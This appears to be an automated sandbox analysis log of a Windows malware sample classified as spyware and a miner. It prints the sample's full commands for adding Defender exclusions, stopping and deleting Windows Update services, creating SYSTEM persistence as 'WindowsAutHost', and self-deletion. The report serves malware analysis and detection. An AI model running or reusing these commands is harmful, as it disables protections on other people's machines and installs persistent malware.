    Source: WindowsAutHost.0.drStatic PE information: Number of sections : 14 > 10
    Source: 8iTXwpHCHb.exeStatic PE information: Number of sections : 14 > 10
    Source: 34E5.tmp.32.drStatic PE information: Number of sections : 11 > 10
    Source: 8iTXwpHCHb.exeVirustotal: Detection: 37%
    Source: 8iTXwpHCHb.exeReversingLabs: Detection: 26%
    Source: C:\Users\user\Desktop\8iTXwpHCHb.exeFile read: C:\Users\user\Desktop\8iTXwpHCHb.exeJump to behavior
    Source: C:\Users\user\Desktop\8iTXwpHCHb.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
    Source: unknownProcess created: C:\Users\user\Desktop\8iTXwpHCHb.exe C:\Users\user\Desktop\8iTXwpHCHb.exe
    Source: C:\Users\user\Desktop\8iTXwpHCHb.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Users\user\Desktop\8iTXwpHCHb.exeProcess created: C:\Windows\System32\cmd.exe cmd /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
    Source: C:\Users\user\Desktop\8iTXwpHCHb.exeProcess created: C:\Windows\System32\cmd.exe cmd /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Users\user\Desktop\8iTXwpHCHb.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell <#ujtstfzc#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { "schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'WindowsAutHost' /tr '''C:\Program Files\WindowsServices\WindowsAutHost'''" } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\WindowsServices\WindowsAutHost') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'WindowsAutHost' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "WindowsAutHost" /t REG_SZ /f /d 'C:\Program Files\WindowsServices\WindowsAutHost' }
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc stop UsoSvc
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\powercfg.exe powercfg /x -hibernate-timeout-ac 0
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc stop WaaSMedicSvc
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\powercfg.exe powercfg /x -hibernate-timeout-dc 0
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc stop wuauserv
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\powercfg.exe powercfg /x -standby-timeout-ac 0
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc stop bits
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\powercfg.exe powercfg /x -standby-timeout-dc 0
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc stop dosvc
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
    Source: C:\Users\user\Desktop\8iTXwpHCHb.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell <#agjywv#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { schtasks /run /tn "WindowsAutHost" } Else { "C:\Program Files\WindowsServices\WindowsAutHost" }
    Source: C:\Users\user\Desktop\8iTXwpHCHb.exeProcess created: C:\Windows\System32\cmd.exe cmd /c choice /C Y /N /D Y /T 3 & Del "C:\Users\user\Desktop\8iTXwpHCHb.exe"
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\choice.exe choice /C Y /N /D Y /T 3
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\schtasks.exe "C:\Windows\system32\schtasks.exe" /run /tn WindowsAutHost
    Source: unknownProcess created: C:\Program Files\WindowsServices\WindowsAutHost C:\Program Files\WindowsServices\WindowsAutHost
    Source: C:\Program Files\WindowsServices\WindowsAutHostProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Program Files\WindowsServices\WindowsAutHostProcess created: C:\Windows\System32\cmd.exe cmd /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
    Source: C:\Program Files\WindowsServices\WindowsAutHostProcess created: C:\Windows\System32\cmd.exe cmd /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Program Files\WindowsServices\WindowsAutHostProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell <#ujtstfzc#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { "schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'WindowsAutHost' /tr '''C:\Program Files\WindowsServices\WindowsAutHost'''" } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\WindowsServices\WindowsAutHost') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'WindowsAutHost' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "WindowsAutHost" /t REG_SZ /f /d 'C:\Program Files\WindowsServices\WindowsAutHost' }
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc stop UsoSvc
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\powercfg.exe powercfg /x -hibernate-timeout-ac 0
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc stop WaaSMedicSvc
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\powercfg.exe powercfg /x -hibernate-timeout-dc 0
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc stop wuauserv
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\powercfg.exe powercfg /x -standby-timeout-ac 0
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc stop bits
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\powercfg.exe powercfg /x -standby-timeout-dc 0
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc stop dosvc
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
    Source: C:\Program Files\WindowsServices\WindowsAutHostProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe qeiyvjdhkxdq
    Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\cmd.exe cmd /c mkdir "C:\Program Files\Google\Libs\" & wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Program Files\Google\Libs\g.log"
    Source: C:\Program Files\WindowsServices\WindowsAutHostProcess created: C:\Windows\System32\cmd.exe cmd /c mkdir "C:\Program Files\Google\Libs\" & wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Program Files\Google\Libs\g.log"
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic PATH Win32_VideoController GET Name, VideoProcessor
    Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Users\user\Desktop\8iTXwpHCHb.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -ForceJump to behavior
    Source: C:\Users\user\Desktop\8iTXwpHCHb.exeProcess created: C:\Windows\System32\cmd.exe cmd /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /fJump to behavior
    Source: C:\Users\user\Desktop\8iTXwpHCHb.exeProcess created: C:\Windows\System32\cmd.exe cmd /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0Jump to behavior
    Source: C:\Users\user\Desktop\8iTXwpHCHb.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell <#ujtstfzc#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { "schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'WindowsAutHost' /tr '''C:\Program Files\WindowsServices\WindowsAutHost'''" } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\WindowsServices\WindowsAutHost') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'WindowsAutHost' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "WindowsAutHost" /t REG_SZ /f /d 'C:\Program Files\WindowsServices\WindowsAutHost' }Jump to behavior
    Source: C:\Users\user\Desktop\8iTXwpHCHb.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell <#agjywv#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { schtasks /run /tn "WindowsAutHost" } Else { "C:\Program Files\WindowsServices\WindowsAutHost" }Jump to behavior
    Source: C:\Users\user\Desktop\8iTXwpHCHb.exeProcess created: C:\Windows\System32\cmd.exe cmd /c choice /C Y /N /D Y /T 3 & Del "C:\Users\user\Desktop\8iTXwpHCHb.exe"Jump to behavior
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc stop UsoSvc Jump to behavior
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc stop WaaSMedicSvc Jump to behavior
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc stop wuauserv Jump to behavior
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc stop bits Jump to behavior
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc stop dosvc Jump to behavior
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f Jump to behavior
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f Jump to behavior
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f Jump to behavior
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f Jump to behavior
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /fJump to behavior
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\powercfg.exe powercfg /x -hibernate-timeout-ac 0 Jump to behavior
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\powercfg.exe powercfg /x -hibernate-timeout-dc 0 Jump to behavior
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\powercfg.exe powercfg /x -standby-timeout-ac 0 Jump to behavior
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\powercfg.exe powercfg /x -standby-timeout-dc 0Jump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\schtasks.exe "C:\Windows\system32\schtasks.exe" /run /tn WindowsAutHostJump to behavior
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\choice.exe choice /C Y /N /D Y /T 3 Jump to behavior
    Source: C:\Program Files\WindowsServices\WindowsAutHostProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -ForceJump to behavior
    Source: C:\Program Files\WindowsServices\WindowsAutHostProcess created: C:\Windows\System32\cmd.exe cmd /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /fJump to behavior
    Source: C:\Program Files\WindowsServices\WindowsAutHostProcess created: C:\Windows\System32\cmd.exe cmd /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0Jump to behavior
    Source: C:\Program Files\WindowsServices\WindowsAutHostProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell <#ujtstfzc#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { "schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'WindowsAutHost' /tr '''C:\Program Files\WindowsServices\WindowsAutHost'''" } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\WindowsServices\WindowsAutHost') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'WindowsAutHost' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "WindowsAutHost" /t REG_SZ /f /d 'C:\Program Files\WindowsServices\WindowsAutHost' }Jump to behavior
    Source: C:\Program Files\WindowsServices\WindowsAutHostProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe qeiyvjdhkxdqJump to behavior
    Source: C:\Program Files\WindowsServices\WindowsAutHostProcess created: C:\Windows\System32\cmd.exe cmd /c mkdir "C:\Program Files\Google\Libs\" & wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Program Files\Google\Libs\g.log"Jump to behavior
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc stop UsoSvc
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc stop WaaSMedicSvc
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc stop wuauserv
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc stop bits
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc stop dosvc
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\powercfg.exe powercfg /x -hibernate-timeout-ac 0
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\powercfg.exe powercfg /x -hibernate-timeout-dc 0
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\powercfg.exe powercfg /x -standby-timeout-ac 0
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\powercfg.exe powercfg /x -standby-timeout-dc 0
    Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\cmd.exe cmd /c mkdir "C:\Program Files\Google\Libs\" & wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Program Files\Google\Libs\g.log"
    Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic PATH Win32_VideoController GET Name, VideoProcessor
    Source: C:\Windows\System32\wbem\WMIC.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCacheJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_mcszdjva.jzu.ps1Jump to behavior
    Source: WR64.sys.32.drBinary string: \Device\WinRing0_1_2_0
    Source: classification engineClassification label: mal100.spyw.evad.mine.winEXE@105/19@2/0
    Source: C:\Windows\System32\conhost.exeCode function: 58_2_00007FF6935D62A0 GetLastError,FormatMessageA,IsDebuggerPresent,OutputDebugStringA,OutputDebugStringA,OutputDebugStringA,LocalFree,58_2_00007FF6935D62A0
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll
    Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:1948:120:WilError_01
    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1520:120:WilError_01
    Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:3248:120:WilError_01
    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2220:120:WilError_01
    Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\JiAlAaAa__shmem3_winpthreads_tdm_
    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5880:120:WilError_01
    Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Global\qeiyvjdhkxdq
    Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:5032:120:WilError_01
    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6068:120:WilError_01
    Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:1840:120:WilError_01
    Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:3736:120:WilError_01
    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:640:120:WilError_01
    Source: C:\Users\user\Desktop\8iTXwpHCHb.exeMutant created: \Sessions\1\BaseNamedObjects\KiBgAaAa__shmem3_winpthreads_tdm_
    Source: C:\Program Files\WindowsServices\WindowsAutHostMutant created: \BaseNamedObjects\MeAdAaAa__shmem3_winpthreads_tdm_
    Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:1096:120:WilError_01
    Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Global\gnbfrobbqdiittna
    Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:4132:120:WilError_01
    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4768:120:WilError_01
    Source: C:\Users\user\Desktop\8iTXwpHCHb.exeFile created: C:\Program Files\WindowsServicesJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
    Source: 8iTXwpHCHb.exeStatic PE information: Image base 0x140000000 > 0x60000000
    Source: 8iTXwpHCHb.exeStatic file information: File size 9861120 > 1048576
    Source: C:\Users\user\Desktop\8iTXwpHCHb.exeDirectory created: C:\Program Files\WindowsServicesJump to behavior
    Source: C:\Program Files\WindowsServices\WindowsAutHostDirectory created: C:\Program Files\Google\LibsJump to behavior
    Source: C:\Windows\System32\cmd.exeDirectory created: C:\Program Files\Google\Libs\g.log
    Source: 8iTXwpHCHb.exeStatic PE information: Raw size of .u4~ is bigger than: 0x100000 < 0x966000
    Source: 8iTXwpHCHb.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT
    Source: Binary string: d:\hotproject\winring0\source\dll\sys\lib\amd64\WinRing0.pdb source: WindowsAutHost, 00000020.00000002.580279703.00000136061B5000.00000004.00000020.00020000.00000000.sdmp, WR64.sys.32.dr
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_00007FF8164C0ACD push eax; retf 7_2_00007FF8164C0DC1
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_00007FF8164C5F33 push edi; ret 7_2_00007FF8164C5F36
    Source: 8iTXwpHCHb.exeStatic PE information: section name: .xdata
    Source: 8iTXwpHCHb.exeStatic PE information: section name: .HJN
    Source: 8iTXwpHCHb.exeStatic PE information: section name: .7Z\
    Source: 8iTXwpHCHb.exeStatic PE information: section name: .u4~
    Source: WindowsAutHost.0.drStatic PE information: section name: .xdata
    Source: WindowsAutHost.0.drStatic PE information: section name: .HJN
    Source: WindowsAutHost.0.drStatic PE information: section name: .7Z\
    Source: WindowsAutHost.0.drStatic PE information: section name: .u4~
    Source: 34E5.tmp.32.drStatic PE information: section name: .xdata
    Source: C:\Windows\System32\conhost.exeCode function: 58_2_00007FF6935E1170 GetModuleHandleW,GetProcAddress,GetProcAddress,LoadLibraryW,GetProcAddress,58_2_00007FF6935E1170
